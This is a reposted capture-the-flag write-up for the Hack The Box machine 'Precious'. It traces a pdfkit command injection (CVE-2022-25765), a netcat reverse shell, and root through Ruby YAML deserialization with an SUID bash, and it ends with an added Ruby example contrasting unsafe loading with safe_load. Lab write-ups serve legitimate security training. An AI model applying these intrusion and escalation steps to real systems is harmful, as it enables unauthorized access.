htb_precious

admin · February 6, 2024 08:44:58 · 21 views · 1828 words · 6 min 5 sec read

information gathering

Use nmap to discover open ports and services:

Now we focus on its http service on port 80.

Access it in the Firefox browser (remember to add the host to your /etc/hosts first):

It seems this website converts a web page to a PDF file. I tried entering aaa in the search bar:

It told me to provide a valid URL. Naturally, I thought of starting an HTTP server on my Kali box and entering my server's address:

As expected, a PDF was downloaded to my own machine. Opening it, we can obviously see some familiar files.

At this point all I have is a PDF, so I used exiftool to analyse it:

The detail that stands out is pdfkit v0.8.6. I tried searchsploit out of habit but found nothing:

Then I turned to Google and found a command injection vulnerability:

After trying several PoCs, I found a working Python exploit [nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 (github.com)][1]:

step 1:

Start a Python simple HTTP server:

step 2:

Start an nc listener:

step 3:

Run the exploit: python CVE-2022-25765.py -t target -a localhost -p localport:

foothold

Now we have a shell after running the exploit:

By following the steps below, I finally got a fully interactive shell:

1. open a bash terminal
2. nc -nlvp 4444
3. ctrl+z to background the job
4. stty -echo raw
5. fg

After looking around, I found a secret directory in the home path:

su henry:


user.txt is in /home/henry.

privilege escalation

The last step is privilege escalation.

First, I tried the simplest but most effective way:

It appears that henry can run the file update_dependencies.rb as root. Use cat to take a look at the file:

What caught my attention is YAML.load; it appears to be vulnerable to a deserialization attack.

Notice that the script loads a file named dependencies.yml. I downloaded a malicious YAML payload from Google to verify the vulnerability:


sudo /usr/bin/ruby /opt/update_dependencies.rb:


It works!

Try setting the SUID bit on /bin/bash:

exploit:


/bin/bash -p:
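An added example, not from the original post, showing the YAML.load issue behind this privilege escalation: the unsafe loader pattern the script uses next to the safe_load form a fixed update_dependencies.rb should use. DependencyEntry and the two YAML documents are constructed for the demo and are not from the box.

```ruby
require 'yaml'

# Stand-in for the kind of object a tagged YAML document can instantiate.
# Constructed for this example; it does not exist on the box.
class DependencyEntry
  attr_accessor :name, :version
end

# Constructed samples: a benign dependencies file and one carrying a
# !ruby/object tag. An unsafe loader builds an instance of whatever class
# the tag names, which is the root of the deserialization problem.
BENIGN_YAML = "---\nyaml: 0.1.1\npdfkit: 0.8.6\n"
TAGGED_YAML = "--- !ruby/object:DependencyEntry\nname: pdfkit\nversion: 0.8.6\n"

# Mirrors the pattern on the box: the full Psych loader on an untrusted file.
# Psych 4 (Ruby >= 3.1) moved that behaviour to unsafe_load, so use whichever
# the installed Ruby provides.
def load_unsafe(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# Hardened form: safe_load only permits plain scalars, arrays and hashes;
# any class tag raises Psych::DisallowedClass before an object is created.
def load_safe(text)
  YAML.safe_load(text)
end

# Returns a symbolic outcome so the two loaders are easy to compare.
def classify(loader, text)
  result = send(loader, text)
  result.is_a?(Hash) ? :plain_hash : result.class.name
rescue Psych::DisallowedClass
  :rejected
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe, tagged: #{classify(:load_unsafe, TAGGED_YAML)}"  # DependencyEntry
  puts "safe,   tagged: #{classify(:load_safe, TAGGED_YAML)}"    # rejected
  puts "safe,   benign: #{classify(:load_safe, BENIGN_YAML)}"    # plain_hash
end
```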

References

[1] nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 (github.com): https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765

Originally published on the WeChat official account (Crush Sec): htb_precious

Reposted from CN-SEC中文网 (please keep this link when reposting): https://cn-sec.com/archives/2472290.html
